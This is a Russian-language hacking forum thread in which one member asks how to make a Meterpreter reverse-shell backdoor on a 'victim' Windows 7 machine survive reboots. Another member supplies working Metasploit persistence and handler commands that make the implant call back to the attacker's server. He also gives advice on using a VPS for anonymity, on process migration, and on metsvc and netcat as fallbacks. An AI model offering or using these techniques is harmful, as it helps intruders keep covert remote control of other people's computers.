 |
|
14.06.2017, 16:35
|
|
Новичок
Регистрация: 13.06.2017
Сообщений: 24
С нами:
4693070
Репутация:
0
|
|
Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен
|
|
|
14.06.2017, 16:49
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
IF_ELSE сказал(а):
Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен
Друг, как только сессия появилась на вражеской машине тебе нужно в метерпреторе сделать persistence это спец функция метерпретора что бы не потерять машину(вражескую) машину после дислокации смены IP и конечно же перезагрузки, а лучше сразу прописать в метасплойте автоперсистенс это позволяет твоему трояну сделать все автоматически то есть закрепится в системе навсегда если конечно же его не спалит антивирь так же есть функция миграте но это уже другая история на webware есть замечательная стать про метерпретор рекомендую ее прочитать а так же плотно изучить все его функции!
|
|
|
|
14.06.2017, 16:51
|
|
Новичок
Регистрация: 13.06.2017
Сообщений: 24
С нами:
4693070
Репутация:
0
|
|
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?
|
|
|
|
14.06.2017, 17:09
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
IF_ELSE сказал(а):
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
и еще важный момент который я упусти у тебя должен быть постоянный ip либо днс тоесть пользуйся сервисом noip(это проброс портов и т.д.) но я рекомендую использовать VPS! у него есть масса плюсов 1) анонимность 2) постоянный ip , да и много чего..
Поясняю если ты вбил в троян стучать на твой локальный ip который начинается на 192.168........ у тебя будет все работать тольько в локальной(местной) сети но как только жертва от нее уйдет сессии не будет! троян будет отстукивать но кому то другому с таким же адресом..
ПС у меня мечта завлодеть постоянными IP такие как 192.168.1.~ и т.д.))) и ломать ничего не нужно сами все стучатся!)))
[doublepost=1497445759,1497445527][/doublepost]
IF_ELSE сказал(а):
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?
можно и так run persistence -U -i 60<--(время отстука домой в секундах) -p 443 -r твой IP и смотри чтобы твой роутер не поменял тебе твой же ip
|
|
|
|
14.06.2017, 17:17
|
|
Новичок
Регистрация: 13.06.2017
Сообщений: 24
С нами:
4693070
Репутация:
0
|
|
Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(
|
|
|
|
14.06.2017, 17:29
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
IF_ELSE сказал(а):
Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(
возможно у жертвы фаервол,тогда миграция или пробуй metsvc сервис!
|
|
|
|
14.06.2017, 17:31
|
|
Новичок
Регистрация: 13.06.2017
Сообщений: 24
С нами:
4693070
Репутация:
0
|
|
Вроде получилось
|
|
|
|
14.06.2017, 20:46
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
а по пробуй-ка автомиграт и автоперсистенс, а если это не поможет тогда netcat
[doublepost=1497458817,1497447393][/doublepost]Automigrate
msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set AutoRunScript post/windows/manage/migrate
msf>set lhost
msf> set lport
msf>exploit
этот пост тоже почитай пригодится!
|
|
|
|
15.06.2017, 11:21
|
|
Новичок
Регистрация: 13.06.2017
Сообщений: 24
С нами:
4693070
Репутация:
0
|
|
Блин - при запуске Venom вылезла ошибка
Как ее победить?
Буду признателен за любые мысли
 |
|
|
|
15.06.2017, 11:35
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
а вы из под sudo запустили если да то это ruby дурит голову.... обновите ОС если проблема не решилась велкам))
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
